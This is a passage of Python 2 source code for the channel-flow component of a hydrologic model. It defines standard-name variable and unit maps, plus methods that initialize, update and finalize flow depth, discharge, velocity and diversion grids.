        'atmosphere_water__rainfall_volume_flux':              'P_rain',
        'glacier_ice__melt_volume_flux':                       'MR',
        ## 'land_surface__elevation':                          'DEM',
        ## 'land_surface__slope':                              'S_bed',
        'land_surface_water__baseflow_volume_flux':            'GW',
        'land_surface_water__evaporation_volume_flux':         'ET',
        'soil_surface_water__infiltration_volume_flux':        'IN',
        'snowpack__melt_volume_flux':                          'SM',
        'water-liquid__mass-per-volume_density':               'rho_H2O',
        #------------------------------------------------------------------------
        'basin_outlet_water_flow__half_of_fanning_friction_factor':'f_outlet',
        'basin_outlet_water_x-section__mean_depth':                'd_outlet',
        'basin_outlet_water_x-section__peak_time_of_depth':            'Td_peak',
        'basin_outlet_water_x-section__peak_time_of_volume_flow_rate': 'T_peak',
        'basin_outlet_water_x-section__peak_time_of_volume_flux':      'Tu_peak',
        'basin_outlet_water_x-section__volume_flow_rate':            'Q_outlet',
        'basin_outlet_water_x-section__volume_flux':                 'u_outlet',
        'basin_outlet_water_x-section__time_integral_of_volume_flow_rate': 'vol_Q',
        'basin_outlet_water_x-section__time_max_of_mean_depth':      'd_peak',
        'basin_outlet_water_x-section__time_max_of_volume_flow_rate':'Q_peak',
        'basin_outlet_water_x-section__time_max_of_volume_flux':     'u_peak',
        #--------------------------------------------------------------------------
        'canals_entrance_water__volume_flow_rate':                 'Q_canals_in', 
        #--------------------------------------------------------------------------    
        'channel_bottom_surface__slope':                           'S_bed',
        'channel_bottom_water_flow__domain_max_of_log_law_roughness_length': 'z0val_max',
        'channel_bottom_water_flow__domain_min_of_log_law_roughness_length': 'z0val_min',
        'channel_bottom_water_flow__log_law_roughness_length':     'z0val',
        'channel_bottom_water_flow__magnitude_of_shear_stress':    'tau',
        'channel_bottom_water_flow__shear_speed':                  'u_star',
        'channel_centerline__sinuosity':                           'sinu',
        'channel_water__volume':                                   'vol',
        'channel_water_flow__domain_max_of_manning_n_parameter':   'nval_max',
        'channel_water_flow__domain_min_of_manning_n_parameter':   'nval_min',
        'channel_water_flow__froude_number':                       'froude',
        'channel_water_flow__half_of_fanning_friction_factor':     'f',
        'channel_water_flow__manning_n_parameter':                 'nval',
        'channel_water_surface__slope':                            'S_free',
        #-----------------------------------------------------------------------
        'channel_water_x-section__domain_max_of_mean_depth':       'd_max',
        'channel_water_x-section__domain_min_of_mean_depth':       'd_min',
        'channel_water_x-section__domain_max_of_volume_flow_rate': 'Q_max',
        'channel_water_x-section__domain_min_of_volume_flow_rate': 'Q_min',
        'channel_water_x-section__domain_max_of_volume_flux':      'u_max',
        'channel_water_x-section__domain_min_of_volume_flux':      'u_min',
        #-----------------------------------------------------------------------      
        'channel_water_x-section__hydraulic_radius':               'Rh',
        'channel_water_x-section__initial_mean_depth':             'd0',
        'channel_water_x-section__mean_depth':                     'd',
        'channel_water_x-section__volume_flow_rate':               'Q',                
        'channel_water_x-section__volume_flux':                    'u',
        'channel_water_x-section__wetted_area':                    'A_wet',
        'channel_water_x-section__wetted_perimeter':               'P_wet',
        ## 'channel_water_x-section_top__width':                   # (not used)
        'channel_x-section_trapezoid_bottom__width':               'width',   ####
        'channel_x-section_trapezoid_side__flare_angle':           'angle',   ####
        'land_surface_water__domain_time_integral_of_runoff_volume_flux': 'vol_R',
        'land_surface_water__runoff_volume_flux':                  'R',
        'model__time_step':                                        'dt',
        'model_grid_cell__area':                                   'da',
        #------------------------------------------------------------------
        'canals__count':                          'n_canals',
        'canals_entrance__x_coordinate':          'canals_in_x',
        'canals_entrance__y_coordinate':          'canals_in_y',
        'canals_entrance_water__volume_fraction': 'Q_canals_fraction',
        'canals_exit__x_coordinate':              'canals_out_x',
        'canals_exit__y_coordinate':              'canals_out_y',
        'canals_exit_water__volume_flow_rate':    'Q_canals_out',
        'sinks__count':                           'n_sinks',
        'sinks__x_coordinate':                    'sinks_x',
        'sinks__y_coordinate':                    'sinks_y',
        'sinks_water__volume_flow_rate':          'Q_sinks',
        'sources__count':                         'n_sources',
        'sources__x_coordinate':                  'sources_x',
        'sources__y_coordinate':                  'sources_y',
        'sources_water__volume_flow_rate':        'Q_sources' }


    #------------------------------------------------
    # Create an "inverse var name map"
    # inv_map = dict(zip(map.values(), map.keys()))
    #------------------------------------------------
##    _long_name_map = dict( zip(_var_name_map.values(),
##                               _var_name_map.keys() ) )

    #----------------------------------------------------------------
    # Map from CSDMS Standard Names (long names) to units strings
    # (UDUNITS-style notation, e.g. 'm s-1' -- TODO confirm).
    #----------------------------------------------------------------
    _var_units_map = {
        'atmosphere_water__rainfall_volume_flux':              'm s-1',
        'glacier_ice__melt_volume_flux':                       'm s-1',
        ## 'land_surface__elevation':                          'm',
        ## 'land_surface__slope':                              '1',
        'land_surface_water__baseflow_volume_flux':            'm s-1',
        'land_surface_water__evaporation_volume_flux':         'm s-1',
        'soil_surface_water__infiltration_volume_flux':        'm s-1',
        'snowpack__melt_volume_flux':                          'm s-1',
        'water-liquid__mass-per-volume_density':               'kg m-3',
        #--------------------------------------------------------------------------- 
        'basin_outlet_water_flow__half_of_fanning_friction_factor':        '1',       
        'basin_outlet_water_x-section__mean_depth':                        'm',
        'basin_outlet_water_x-section__peak_time_of_depth':                'min',
        'basin_outlet_water_x-section__peak_time_of_volume_flow_rate':     'min',
        'basin_outlet_water_x-section__peak_time_of_volume_flux':          'min',        
        'basin_outlet_water_x-section__time_integral_of_volume_flow_rate': 'm3',
        'basin_outlet_water_x-section__time_max_of_mean_depth':            'm',
        'basin_outlet_water_x-section__time_max_of_volume_flow_rate':      'm3 s-1',
        'basin_outlet_water_x-section__time_max_of_volume_flux':           'm s-1',
        'basin_outlet_water_x-section__volume_flow_rate':                  'm3',
        'basin_outlet_water_x-section__volume_flux':                       'm s-1',
        #---------------------------------------------------------------------------
        'canals_entrance_water__volume_flow_rate':                 'm3 s-1', 
        #---------------------------------------------------------------------------  
        'channel_bottom_surface__slope':                           '1',
        'channel_bottom_water_flow__domain_max_of_log_law_roughness_length':  'm',
        'channel_bottom_water_flow__domain_min_of_log_law_roughness_length':  'm',
        'channel_bottom_water_flow__log_law_roughness_length':     'm',
        'channel_bottom_water_flow__magnitude_of_shear_stress':    'kg m-1 s-2',
        'channel_bottom_water_flow__shear_speed':                  'm s-1',
        'channel_centerline__sinuosity':                           '1',    
        'channel_water__volume':                                   'm3', 
        'channel_water_flow__froude_number':                       '1',
        'channel_water_flow__half_of_fanning_friction_factor':     '1',               
        'channel_water_flow__manning_n_parameter':                 'm-1/3 s',
        'channel_water_flow__domain_max_of_manning_n_parameter':   'm-1/3 s',
        'channel_water_flow__domain_min_of_manning_n_parameter':   'm-1/3 s',
        'channel_water_surface__slope':                            '1',
        #--------------------------------------------------------------------
        'channel_water_x-section__domain_max_of_mean_depth':       'm',
        'channel_water_x-section__domain_min_of_mean_depth':       'm',
        'channel_water_x-section__domain_max_of_volume_flow_rate': 'm3 s-1',
        'channel_water_x-section__domain_min_of_volume_flow_rate': 'm3 s-1',
        'channel_water_x-section__domain_max_of_volume_flux':      'm s-1',
        'channel_water_x-section__domain_min_of_volume_flux':      'm s-1',
        #--------------------------------------------------------------------
        'channel_water_x-section__hydraulic_radius':               'm',
        'channel_water_x-section__initial_mean_depth':             'm',
        'channel_water_x-section__mean_depth':                     'm',
        'channel_water_x-section__volume_flow_rate':               'm3 s-1',
        'channel_water_x-section__volume_flux':                    'm s-1',
        'channel_water_x-section__wetted_area':                    'm2',
        'channel_water_x-section__wetted_perimeter':               'm',
        'channel_x-section_trapezoid_bottom__width':               'm',
        'channel_x-section_trapezoid_side__flare_angle':           'rad', # CHECKED 
        'land_surface_water__domain_time_integral_of_runoff_volume_flux': 'm3',  
        'land_surface_water__runoff_volume_flux':                  'm s-1',        
        'model__time_step':                                        's',
        'model_grid_cell__area':                                   'm2',
        #------------------------------------------------------------------
        'canals__count':                          '1',
        'canals_entrance__x_coordinate':          'm',
        'canals_entrance__y_coordinate':          'm',
        'canals_entrance_water__volume_fraction': '1',
        'canals_exit__x_coordinate':              'm',
        'canals_exit__y_coordinate':              'm',
        'canals_exit_water__volume_flow_rate':    'm3 s-1',
        'sinks__count':                           '1',
        'sinks__x_coordinate':                    'm',
        'sinks__y_coordinate':                    'm',
        'sinks_water__volume_flow_rate':          'm3 s-1',
        'sources__count':                         '1',
        'sources__x_coordinate':                  'm',
        'sources__y_coordinate':                  'm',
        'sources_water__volume_flow_rate':        'm3 s-1' }

    #------------------------------------------------    
    # Return NumPy string arrays vs. Python lists ?
    #------------------------------------------------
    ## _input_var_names  = np.array( _input_var_names )
    ## _output_var_names = np.array( _output_var_names )
        
    #-------------------------------------------------------------------
    def get_input_var_names(self):

        """Return the long names of all variables this component requires.

        Note: These are currently the variables needed from other
        components, as opposed to those read from files or the GUI.
        """
        names = self._input_var_names
        return names

    #   get_input_var_names()
    #-------------------------------------------------------------------
    def get_output_var_names(self):

        """Return the long names of all variables this component can provide."""
        names = self._output_var_names
        return names

    #   get_output_var_names()
    #-------------------------------------------------------------------
    def get_var_name(self, long_var_name):

        """Map a long (CSDMS-style) variable name to its short internal name.

        Raises KeyError if long_var_name is not in the map.
        """
        name_map = self._var_name_map
        return name_map[ long_var_name ]

    #   get_var_name()
    #-------------------------------------------------------------------
    def get_var_units(self, long_var_name):

        """Return the units string for a long variable name.

        Raises KeyError if long_var_name is not in the map.
        """
        units_map = self._var_units_map
        return units_map[ long_var_name ]

    #   get_var_units()
    #-------------------------------------------------------------------
##    def get_var_type(self, long_var_name):
##
##        #---------------------------------------
##        # So far, all vars have type "double",
##        # but use the one in BMI_base instead.
##        #---------------------------------------
##        return 'float64'
##    
##    #   get_var_type()
    #-------------------------------------------------------------------
    def set_constants(self):

        """Define the physical and numerical constants used by this component.

        All values are stored as numpy float64 scalars on self.
        """
        g     = np.float64(9.81)     # gravitational constant [m s-2]
        kappa = np.float64(0.408)    # von Karman's constant
        #--------------------------------------------------------
        self.g          = g
        self.kappa      = kappa
        self.aval       = np.float64(0.476)   # integration constant
        self.law_const  = np.sqrt(g) / kappa
        self.one_third  = np.float64(1.0) / 3.0
        self.two_thirds = np.float64(2.0) / 3.0
        self.deg_to_rad = np.pi / 180.0

    #   set_constants()
    #-------------------------------------------------------------------
    def initialize(self, cfg_file=None, mode="nondriver", SILENT=False): 

        """Initialize the Channels component (BMI/OpenMI-style).

        Loads config vars from cfg_file, reads grid and basin info,
        initializes time vars, opens and reads input files, sets up
        D8 and computed variables, and opens output files.  If
        comp_status is 'Disabled', output saving is turned off and
        the method returns early.  self.status follows the OpenMI
        2.0 convention ('initializing' -> 'initialized').
        """
        if not(SILENT):
            print ' '
            print 'Channels component: Initializing...'
        
        self.status   = 'initializing'  # (OpenMI 2.0 convention)
        self.mode     = mode
        self.cfg_file = cfg_file
        
        #-----------------------------------------------
        # Load component parameters from a config file
        #-----------------------------------------------
        self.set_constants()           # (12/7/09)
        # print 'CHANNELS calling initialize_config_vars()...'
        self.initialize_config_vars()   
        # print 'CHANNELS calling read_grid_info()...'
        self.read_grid_info()
        #print 'CHANNELS calling initialize_basin_vars()...'
        self.initialize_basin_vars()  # (5/14/10)
        #-----------------------------------------
        # This must come before "Disabled" test.
        #-----------------------------------------
        # print 'CHANNELS calling initialize_time_vars()...'
        self.initialize_time_vars()
        
        #----------------------------------
        # Has component been turned off ?
        #----------------------------------
        if (self.comp_status == 'Disabled'):
            if not(SILENT):
                print 'Channels component: Disabled.'
            self.SAVE_Q_GRIDS  = False   # (It is True by default.)
            self.SAVE_Q_PIXELS = False   # (It is True by default.)
            self.DONE = True
            self.status = 'initialized'  # (OpenMI 2.0 convention) 
            return

##        print '################################################'
##        print 'min(d0), max(d0) =', self.d0.min(), self.d0.max()
##        print '################################################'
        
        #---------------------------------------------
        # Open input files needed to initialize vars 
        #---------------------------------------------
        # Can't move read_input_files() to start of
        # update(), since initial values needed here.
        #---------------------------------------------
        # print 'CHANNELS calling open_input_files()...'
        self.open_input_files()
        print 'CHANNELS calling read_input_files()...'
        self.read_input_files()

        #-----------------------
        # Initialize variables
        #-----------------------
        print 'CHANNELS calling initialize_d8_vars()...'
        self.initialize_d8_vars()  # (depend on D8 flow grid)
        print 'CHANNELS calling initialize_computed_vars()...'
        self.initialize_computed_vars()

        #--------------------------------------------------
        # (5/12/10) I think this is obsolete now.
        #--------------------------------------------------
        # Make sure self.Q_ts_file is not NULL (12/22/05)
        
        # This is only output file that is set by default
        # and is still NULL if user hasn't opened the
        # output var dialog for the channel process.
        #--------------------------------------------------
##        if (self.SAVE_Q_PIXELS and (self.Q_ts_file == '')):    
##            self.Q_ts_file = (self.case_prefix + '_0D-Q.txt')       

        self.open_output_files()
        self.status = 'initialized'  # (OpenMI 2.0 convention) 
        
    #   initialize()
    #-------------------------------------------------------------------
    ## def update(self, dt=-1.0, time_seconds=None):
    def update(self, dt=-1.0):

        """Advance the channel-flow solution by one time step.

        Updates, in order: excess rainrate R and its mass integral,
        discharge, diversions, flow volume and depth, hydraulic
        radius / free-surface slope (method-dependent), shear stress
        and speed, friction factor, velocity, Froude number, outlet
        and peak values, and the outflow mass integral; then writes
        output files and advances the internal clock.  Sets status
        to 'updated', or to 'failed' (and DONE=True) when the depth
        or velocity sanity checks fail.

        dt: process time step [s]; -1.0 means "use self.dt"
            (interpreted inside update_time()).
        """
        #---------------------------------------------
        # Note that u and d from previous time step
        # must be used on RHS of the equations here.
        #---------------------------------------------
        self.status = 'updating'  # (OpenMI 2.0 convention)

        #-------------------------------------------------------
        # There may be times where we want to call this method
        # even if component is not the driver.  But note that
        # the TopoFlow driver also makes this same call.
        #-------------------------------------------------------
        if (self.mode == 'driver'):
            self.print_time_and_value(self.Q_outlet, 'Q_out', '[m^3/s]')
                                      ### interval=0.5)  # [seconds]

        # For testing (5/19/12)
        # self.print_time_and_value(self.Q_outlet, 'Q_out', '[m^3/s]  CHANNEL')
            
        ## DEBUG = True
        DEBUG = False
 
        #-------------------------
        # Update computed values
        #-------------------------
        if (DEBUG): print '#### Calling update_R()...'
        self.update_R()
        if (DEBUG): print '#### Calling update_R_integral()...'
        self.update_R_integral()
        if (DEBUG): print '#### Calling update_discharge()...'
        self.update_discharge()
        if (DEBUG): print '#### Calling update_diversions()...'
        self.update_diversions()
        if (DEBUG): print '#### Calling update_flow_volume()...'
        self.update_flow_volume()
        if (DEBUG): print '#### Calling update_flow_depth()...'
        self.update_flow_depth()
        #-----------------------------------------------------------------
        if not(self.DYNAMIC_WAVE):
            if (DEBUG): print '#### Calling update_trapezoid_Rh()...'
            self.update_trapezoid_Rh()
            # print 'Rhmin, Rhmax =', self.Rh.min(), self.Rh.max()
        #-----------------------------------------------------------------
        # (9/9/14) Moved this here from update_velocity() methods.
        #-----------------------------------------------------------------        
        if not(self.KINEMATIC_WAVE):
            if (DEBUG): print '#### Calling update_free_surface_slope()...' 
            self.update_free_surface_slope()
        if (DEBUG): print '#### Calling update_shear_stress()...'
        self.update_shear_stress()
        if (DEBUG): print '#### Calling update_shear_speed()...'
        self.update_shear_speed()  
        #-----------------------------------------------------------------
        # Must update friction factor before velocity for DYNAMIC_WAVE.
        #-----------------------------------------------------------------        
        if (DEBUG): print '#### Calling update_friction_factor()...'
        self.update_friction_factor()      
        #-----------------------------------------------------------------          
        if (DEBUG): print '#### Calling update_velocity()...'
        self.update_velocity()
        self.update_velocity_on_edges()     # (set to zero)
        if (DEBUG): print '#### Calling update_froude_number()...'
        self.update_froude_number()
        #-----------------------------------------------------------------
##        print 'Rmin, Rmax =', self.R.min(), self.R.max()
##        print 'Qmin,  Qmax =',  self.Q.min(), self.Q.max()
##        print 'umin,  umax =',  self.u.min(), self.u.max()
##        print 'dmin,  dmax =',  self.d.min(), self.d.max()
##        print 'nmin,  nmax =',  self.nval.min(), self.nval.max()
##        print 'Rhmin, Rhmax =', self.Rh.min(), self.Rh.max()
##        print 'Smin,  Smax =',  self.S_bed.min(), self.S_bed.max()
        if (DEBUG): print '#### Calling update_outlet_values()...'
        self.update_outlet_values()
        if (DEBUG): print '#### Calling update peak values()...'
        self.update_peak_values()
        if (DEBUG): print '#### Calling update_Q_out_integral()...'
        self.update_Q_out_integral()

        #---------------------------------------------
        # This takes extra time and is now done
        # only at the end, in finalize().  (8/19/13)
        #---------------------------------------------
        # But then "topoflow_driver" doesn't get
        # correctly updated values for some reason.
        #---------------------------------------------
        ## self.update_mins_and_maxes()
        
        #------------------------
        # Check computed values
        #------------------------
        D_OK = self.check_flow_depth()
        U_OK = self.check_flow_velocity()
        OK   = (D_OK and U_OK)

        #-------------------------------------------
        # Read from files as needed to update vars 
        #-----------------------------------------------------
        # NB! This is currently not needed for the "channel
        # process" because values don't change over time and
        # read_input_files() is called by initialize().
        #-----------------------------------------------------
        # if (self.time_index > 0):
        #     self.read_input_files()

        #----------------------------------------------
        # Write user-specified data to output files ?
        #----------------------------------------------
        # Components use own self.time_sec by default.
        #-----------------------------------------------
        if (DEBUG): print '#### Calling write_output_files()...'
        self.write_output_files()
        ## self.write_output_files( time_seconds )

        #-----------------------------
        # Update internal clock
        # after write_output_files()
        #-----------------------------
        if (DEBUG): print '#### Calling update_time()'
        self.update_time( dt )
        
        if (OK):
            self.status = 'updated'  # (OpenMI 2.0 convention)
        else:
            self.status = 'failed'
            self.DONE   = True
            
    #   update()   
    #-------------------------------------------------------------------
    def finalize(self):

        """Wrap up the model run: report results and close all files.

        Computes final mins/maxes and prints a report before closing
        the input and output files.  Sets status to 'finalizing' and
        then 'finalized' per the OpenMI convention.
        """
        #---------------------------------------------------
        # We can compute mins and maxes in the final grids
        # here, but the framework will not then pass them
        # to any component (e.g. topoflow_driver) that may
        # need them.
        #---------------------------------------------------
        REPORT = True
        self.update_mins_and_maxes( REPORT=REPORT )  ## (2/6/13)
        self.print_final_report(comp_name='Channels component')
        
        self.status = 'finalizing'  # (OpenMI)
        self.close_input_files()    # TopoFlow input "data streams"
        self.close_output_files()
        self.status = 'finalized'   # (OpenMI)

        #---------------------------
        # Release all of the ports
        #----------------------------------------
        # Make this call in "finalize()" method
        # of the component's CCA Imple file
        #----------------------------------------
        # self.release_cca_ports( d_services )
        
    #   finalize()
    #-------------------------------------------------------------------
    def set_computed_input_vars(self):

        """Derive internal settings from config vars after they are read.

        Called at the end of initialize_config_vars() (in BMI_base.py).
        Sets the wave-method flags from the cfg-file extension, makes
        sure nval/z0val (and their min/max) are defined for both
        roughness options, fixes code_type/slope_type, and clamps the
        "save_dts" to be no smaller than the process dt.
        """
        cfg_extension = self.get_attribute( 'cfg_extension' ).lower()
        # cfg_extension = self.get_cfg_extension().lower()
        self.KINEMATIC_WAVE = ("kinematic" in cfg_extension)
        self.DIFFUSIVE_WAVE = ("diffusive" in cfg_extension)
        self.DYNAMIC_WAVE   = ("dynamic"   in cfg_extension)

        ##########################################################
        # (5/17/12) If MANNING, we need to set z0vals to -1 so
        # they are always defined for use with new framework.
        ##########################################################
        #----------------------------------------------------------
        # Bug fix: use "is not None" instead of "!= None".  When
        # nval/z0val is a numpy array, "!= None" is an elementwise
        # comparison whose truth value is ambiguous and raises a
        # ValueError inside an "if" statement.
        #----------------------------------------------------------
        if (self.MANNING):
            if (self.nval is not None):
                self.nval = np.float64( self.nval )  #### 10/9/10, NEED
                self.nval_min = self.nval.min()
                self.nval_max = self.nval.max()
            #-----------------------------------
            self.z0val     = np.float64(-1)
            self.z0val_min = np.float64(-1)
            self.z0val_max = np.float64(-1)
            
        if (self.LAW_OF_WALL):
            if (self.z0val is not None):
                self.z0val = np.float64( self.z0val )  #### (10/9/10)
                self.z0val_min = self.z0val.min()
                self.z0val_max = self.z0val.max()
            #-----------------------------------
            self.nval      = np.float64(-1)
            self.nval_min  = np.float64(-1)
            self.nval_max  = np.float64(-1)
            
        #-------------------------------------------
        # These currently can't be set to anything
        # else in the GUI, but need to be defined.
        #-------------------------------------------
        self.code_type  = 'Grid'
        self.slope_type = 'Grid'

        #---------------------------------------------------------
        # Make sure that all "save_dts" are larger or equal to
        # the specified process dt.  There is no point in saving
        # results more often than they change.
        # Issue a message to this effect if any are smaller ??
        #---------------------------------------------------------
        self.save_grid_dt   = np.maximum(self.save_grid_dt,   self.dt)
        self.save_pixels_dt = np.maximum(self.save_pixels_dt, self.dt)
        
        #---------------------------------------------------
        # This is now done in CSDMS_base.read_config_gui()
        # for any var_name that starts with "SAVE_".
        #---------------------------------------------------
        # self.SAVE_Q_GRID = (self.SAVE_Q_GRID == 'Yes')
        
    #   set_computed_input_vars()
    #-------------------------------------------------------------------
    def initialize_d8_vars(self):

        """Create and initialize the embedded D8 flow-grid component.

        Instantiates d8_base.d8_component(), passes it this
        component's site_prefix and in_directory (it builds its own
        cfg filename from these), and initializes it.
        """
        #---------------------------------------------
        # Compute and store a variety of (static) D8
        # flow grid variables.  Embed structure into
        # the "channel_base" component.
        #---------------------------------------------
        self.d8 = d8_base.d8_component()
        ###############################################
        # (5/13/10)  Do next line here for now, until
        # the d8 cfg_file includes static prefix.
        # Same is done in GW_base.py.
        ###############################################
        # tf_d8_base.read_grid_info() also needs
        # in_directory to be set. (10/27/11)
        ###############################################
        
        #--------------------------------------------------         
        # D8 component builds its cfg filename from these  
        #--------------------------------------------------      
        self.d8.site_prefix  = self.site_prefix
        self.d8.in_directory = self.in_directory
        self.d8.initialize( cfg_file=None,
                            SILENT=self.SILENT,
                            REPORT=self.REPORT )
        
        ## self.code = self.d8.code   # Don't need this.
        
        #-------------------------------------------      
        # We'll need this once we shift from using
        # "tf_d8_base.py" to the new "d8_base.py"
        #-------------------------------------------
        # self.d8.update(self.time, SILENT=False, REPORT=True)

    #   initialize_d8_vars()
    #-------------------------------------------------------------
    def initialize_computed_vars(self):

        """Allocate and initialize the grids computed by this component.

        Converts bank angles to radians, applies sinuosity to flow
        lengths and slopes, allocates the u, f, d, Q, R, tau, u_star,
        froude and Rh grids, computes the initial wetted geometry and
        water volume, and initializes outlet/peak/min-max trackers.
        Mass-balance accumulators vol_R and vol_Q start at zero.
        """
        #-----------------------------------------------
        # Convert bank angles from degrees to radians. 
        #-----------------------------------------------
        self.angle = self.angle * self.deg_to_rad  # [radians]
        
        #------------------------------------------------
        # 8/29/05.  Multiply ds by (unitless) sinuosity
        # Orig. ds is used by subsurface flow
        #------------------------------------------------
        # NB!  We should also divide slopes in S_bed by
        # the sinuosity, as now done here.
        #----------------------------------------------------
        # NB!  This saves a modified version of ds that
        #      is only used within the "channels" component.
        #      The original "ds" is stored within the
        #      topoflow model component and is used for
        #      subsurface flow, etc.
        #----------------------------------------------------
        ### self.d8.ds_chan = (self.sinu * ds)
        ### self.ds = (self.sinu * self.d8.ds)
        self.d8.ds = (self.sinu * self.d8.ds)  ### USE LESS MEMORY

        ###################################################
        ###################################################
        ### S_bed = (S_bed / self.sinu)     #*************
        self.slope = (self.slope / self.sinu)
        self.S_bed  = self.slope
        ###################################################
        ###################################################
        
        #---------------------------
        # Initialize spatial grids
        #-----------------------------------------------
        # NB!  It is not a good idea to initialize the
        # water depth grid to a nonzero scalar value.
        #-----------------------------------------------
        print 'Initializing u, f, d grids...'
        self.u = np.zeros([self.ny, self.nx], dtype='Float64')
        self.f = np.zeros([self.ny, self.nx], dtype='Float64')
        self.d = np.zeros([self.ny, self.nx], dtype='Float64') + self.d0

        #########################################################
        # Add this on (2/3/13) so make the TF driver happy
        # during its initialize when it gets reference to R.
        # But in "update_R()", be careful not to break the ref.
        # "Q" may be subject to the same issue.
        #########################################################
        self.Q = np.zeros([self.ny, self.nx], dtype='Float64')
        self.R = np.zeros([self.ny, self.nx], dtype='Float64')

        #---------------------------------------------------
        # Initialize new grids. Is this needed?  (9/13/14)
        #---------------------------------------------------
        self.tau    = np.zeros([self.ny, self.nx], dtype='Float64')
        self.u_star = np.zeros([self.ny, self.nx], dtype='Float64')
        self.froude = np.zeros([self.ny, self.nx], dtype='Float64')
                        
        #---------------------------------------
        # These are used to check mass balance
        #---------------------------------------
        self.vol_R = self.initialize_scalar( 0, dtype='float64')
        self.vol_Q = self.initialize_scalar( 0, dtype='float64')
        
        #-------------------------------------------
        # Make sure all slopes are valid & nonzero
        # since otherwise flow will accumulate
        #-------------------------------------------
        if (self.KINEMATIC_WAVE):    
            self.remove_bad_slopes()      #(3/8/07. Only Kin Wave case)
        
        #----------------------------------------
        # Initial volume of water in each pixel
        #-----------------------------------------------------------
        # Note: angles were read as degrees & converted to radians
        # above.  Trapezoidal cross-section:
        #   A_wet = d * (w + d*tan(angle)),  P_wet = w + 2d/cos(angle)
        #-----------------------------------------------------------
        L2         = self.d * np.tan(self.angle)
        self.A_wet = self.d * (self.width + L2)
        self.P_wet = self.width + (np.float64(2) * self.d / np.cos(self.angle) )
        self.vol   = self.A_wet * self.d8.ds   # [m3]

        #-------------------------------------------------------        
        # Note: depth is often zero at the start of a run, and
        # both width and then P_wet are also zero in places.
        # Therefore initialize Rh as shown.
        #-------------------------------------------------------
        self.Rh = np.zeros([self.ny, self.nx], dtype='Float64')
        ## self.Rh = self.A_wet / self.P_wet   # [m]
        ## print 'P_wet.min() =', self.P_wet.min()
        ## print 'width.min() =', self.width.min()
       
        ## self.initialize_diversion_vars()    # (9/22/14)
        self.initialize_outlet_values()
        self.initialize_peak_values()
        self.initialize_min_and_max_values()  ## (2/3/13)

        #########################################
        # Maybe save all refs in a dictionary
        # called "self_values" here ? (2/19/13)
        # Use a "reverse" var_name mapping?
        # inv_map = dict(zip(map.values(), map.keys()))
        #########################################
        
##        w  = np.where( self.width <= 0 )
##        nw = np.size( w[0] )   # (This is correct for 1D or 2D.)
##        if (nw > 0):
##            print 'WARNING:'
##            print 'Number of locations where width==0 =', nw
##            if (nw < 10):
##                print 'locations =', w
##            print ' '

    #   initialize_computed_vars()
    #-------------------------------------------------------------
    def initialize_diversion_vars(self):

        """Convert diversion (x,y) coordinates into grid (row, col) IDs.

        Builds index tuples for sources, sinks, canal entrances and
        canal exits, and allocates Q_canals_in.
        """
        # NOTE(review): rows/cols are computed by dividing coordinates
        # by ny/nx (the grid DIMENSIONS).  One would expect division
        # by the cell size (e.g. dy/dx) here — confirm the units of
        # sources_x/sources_y before relying on these IDs.
        #-----------------------------------------
        # Compute source IDs from xy coordinates
        #-----------------------------------------
        source_rows     = np.int32( self.sources_y / self.ny )
        source_cols     = np.int32( self.sources_x / self.nx )
        self.source_IDs = (source_rows, source_cols)
        ## self.source_IDs = (source_rows * self.nx) + source_cols
   
        #---------------------------------------
        # Compute sink IDs from xy coordinates
        #---------------------------------------
        sink_rows     = np.int32( self.sinks_y / self.ny )
        sink_cols     = np.int32( self.sinks_x / self.nx )
        self.sink_IDs = (sink_rows, sink_cols)
        ## self.sink_IDs = (sink_rows * self.nx) + sink_cols
        
        #-------------------------------------------------
        # Compute canal entrance IDs from xy coordinates
        #-------------------------------------------------
        canal_in_rows     = np.int32( self.canals_in_y / self.ny )
        canal_in_cols     = np.int32( self.canals_in_x / self.nx )
        self.canal_in_IDs = (canal_in_rows, canal_in_cols)
        ## self.canal_in_IDs = (canal_in_rows * self.nx) + canal_in_cols
        
        #---------------------------------------------
        # Compute canal exit IDs from xy coordinates
        #---------------------------------------------
        canal_out_rows     = np.int32( self.canals_out_y / self.ny )
        canal_out_cols     = np.int32( self.canals_out_x / self.nx )
        self.canal_out_IDs = (canal_out_rows, canal_out_cols)
        ## self.canal_out_IDs = (canal_out_rows * self.nx) + canal_out_cols

        #--------------------------------------------------
        # This will be computed from Q_canal_fraction and
        # self.Q and then passed back to Diversions
        #--------------------------------------------------
        # NOTE(review): np.array(self.n_sources, ...) creates a 0-d
        # array holding the VALUE n_sources, not an array of length
        # n_sources.  np.zeros(self.n_sources) was probably intended
        # — confirm against the Diversions component.
        self.Q_canals_in = np.array( self.n_sources, dtype='float64' )

    #   initialize_diversion_vars()
    #-------------------------------------------------------------------
    def initialize_outlet_values(self):

        """Create mutable scalars for the values monitored at the outlet.

        TopoFlow keeps references to these for its stopping
        condition, so each must be a mutable, 1D numpy array (as
        returned by initialize_scalar) for updates to be visible to
        the holder of the reference.  (Q_last is internal to
        TopoFlow.)
        """
        # self.Q_outlet = self.Q[ self.outlet_ID ]
        for var in ('Q_outlet', 'u_outlet', 'd_outlet', 'f_outlet'):
            setattr( self, var, self.initialize_scalar(0, dtype='float64') )
          
    #   initialize_outlet_values()  
    #-------------------------------------------------------------------
    def initialize_peak_values(self):

        """Zero the peak-value trackers (peaks and their times of occurrence)."""
        peak_vars = ('Q_peak', 'T_peak', 'u_peak',
                     'Tu_peak', 'd_peak', 'Td_peak')
        for var in peak_vars:
            setattr( self, var, self.initialize_scalar(0, dtype='float64') )

    #   initialize_peak_values()
    #-------------------------------------------------------------------
    def initialize_min_and_max_values(self):

        """Initialize running min & max trackers for Q, u and d.

        (2/3/13), for new framework.  Mins start very large and
        maxes very small so any computed value replaces them.
        """
        v = 1e6
        for var in ('Q', 'u', 'd'):
            setattr( self, var + '_min', self.initialize_scalar(v,  dtype='float64') )
            setattr( self, var + '_max', self.initialize_scalar(-v, dtype='float64') )

    #   initialize_min_and_max_values() 
    #-------------------------------------------------------------------
    # def update_excess_rainrate(self):
    def update_R(self):

        """Update R, the net "excess rainrate" over each pixel.

        Every term has units [m/s] and the sum is the net gain/loss
        rate over the pixel.  R can be positive or negative; if
        negative, water is removed from the surface at rate R until
        the surface water is consumed.

        Gains:  P_rain (liquid-only precip, 9/14/14), SM (snowmelt),
                GW (seepage, water table intersecting surface),
                MR (icemelt).
        Losses: ET (evaporation), IN (infiltration).
        All are references to other components' vars, provided by
        the framework (5/18/12).  P_rain is converted to [m/s] by
        read_input_data().
        """
        gains  = self.P_rain + self.SM + self.GW + self.MR
        losses = self.ET + self.IN
        self.R = gains - losses
            
    #   update_R()
    #-------------------------------------------------------------------
    def update_R_integral(self):

